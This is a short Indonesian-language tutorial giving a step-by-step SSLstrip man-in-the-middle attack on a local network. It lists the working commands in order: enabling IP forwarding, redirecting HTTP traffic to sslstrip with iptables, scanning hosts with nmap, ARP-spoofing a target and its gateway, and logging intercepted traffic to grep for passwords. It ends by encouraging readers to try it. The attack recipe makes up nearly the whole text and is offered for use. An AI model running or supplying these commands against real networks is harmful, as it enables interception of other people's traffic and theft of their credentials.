Topologi ssltrip
1. Echo 1 > /proc/sys/net/ipv4/ip_forward
akan merubah komputer hacker manjadi gateway, dengan meneruskan paket yang datang (forward) seakan-akan dialah gerbang menuju internet.
2. Iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 10000
setiap paket yang datang menuju http (port 80) akan dibelokkan ke port 10000 (ssltrip)
3. nmap -sP 192.168.55.0/24(ip public tempat kita melakukan hacking)
melihat semua ip yang connect ke jaringan
4. Arpspoof -i eth0 -t 192.168.55.106 192.168.55.1
ARP akan di broadcast ke seluruh jaringan termasuk ke komputer target dan gateway agar semua paket yang menuju internet akan tertipu. Penipuan ini akan mengakibatkan semua paket jaringan disadap oleh komputer hacker.
5. Sslstrip -a -w hasilsadap
perintah diatas akan menyimpan seluruh paket berupa karakter ke file hasilsadap.
Gunakan teknik pengolahan kata (sampah hasil sadapan) ke file hasilsadapan
ex: cat hasilsadap | grep -i “passwd”
6. SELAMAT MENCOBA